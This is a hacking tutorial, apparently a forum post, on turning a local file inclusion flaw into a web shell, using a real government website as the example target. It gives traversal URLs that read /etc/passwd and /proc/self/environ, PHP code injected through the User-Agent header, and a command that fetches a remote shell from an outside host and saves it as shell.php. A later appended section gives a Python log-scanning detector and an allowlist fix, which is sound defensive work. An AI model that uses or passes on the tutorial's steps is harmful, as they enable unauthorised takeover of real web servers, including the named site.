LFI TO SHELL TUT


Things you will need:

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

First of all, see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it).

Try to open /etc/passwd

Example:
Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd

OK, fine... We can open /etc/passwd.

Now type /proc/self/environ in place of /etc/passwd.

Example:
Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ

Now download and install User-Agent switcher.

Go to Tools > Default User-Agent > Edit User Agents
You will get this window.

Now make a new User-Agent.
Go to New > New User-Agent

You will get something like this:

Now leave everything as it is except the description and user-agent.
In the description, enter a name for it (mine is phpinfo).

In User-Agent paste this in there.
Code:
<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (or whatever your User-Agent is called)

Go to your site and refresh it.

You should get something like this in your site.


Now search for "disable_functions" (Ctrl+F Search function)

Mine is
Code:
disable_functions     | no value    | no value

That is good. We can spawn our shell now!

Now go back and edit your User-Agent.

Change "User-Agent" to:
Code:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

(What does this function do? It downloads the shell in .txt format and renames it as shell.php.)

Save it and refresh your site.

Go to http://www.yourLFIsite.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila, we have our shell up.
Enjoy.
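
The requests in this walkthrough leave two traces in a web server access log: the traversal string in the query and a PHP open tag in the User-Agent field. The following is an added example, not part of the original post, that flags both in combined-format log lines; the sample lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format: ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$')
TRAVERSAL_RE = re.compile(r'(?:\.\./)+/?(?:proc/self/environ|etc/passwd)')
PHP_TAG_RE = re.compile(r'<\?(?:php|=|\s|[a-z_]+\()', re.I)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /content1.php?page=5'
    '&directLinks=../../../../etc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0 Firefox/15.0"',
    '203.0.113.7 - - [10/Oct/2012:13:57:02 +0000] "GET /content1.php?page=5'
    '&directLinks=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 912 "-" "<?php phpinfo();?>"',
    '198.51.100.20 - - [10/Oct/2012:13:58:11 +0000] "GET /content1.php?page=5 HTTP/1.1"'
    ' 200 4312 "-" "Mozilla/5.0 Firefox/15.0"',
]

def fully_decode(value):
    """Undo repeated percent-encoding (%252e%252e%252f -> ../) before matching."""
    for _ in range(3):
        value = unquote(value)
    return value.replace("\\", "/")

def classify(line):
    """Return (ip, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = set()
    target = fully_decode(m["target"])
    if TRAVERSAL_RE.search(target):
        findings.add("traversal")
    if "proc/self/environ" in target:
        findings.add("environ_include")
    if PHP_TAG_RE.search(m["ua"]):
        findings.add("php_in_user_agent")
    return m["ip"], findings

def scan(lines):
    """Merge findings per client IP; environ_include with php_in_user_agent is the pair to alert on."""
    per_ip = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            per_ip.setdefault(parsed[0], set()).update(parsed[1])
    return per_ip
```

On the application side, the underlying fix is to map the page parameter to a fixed allowlist of file names instead of passing request input to an include.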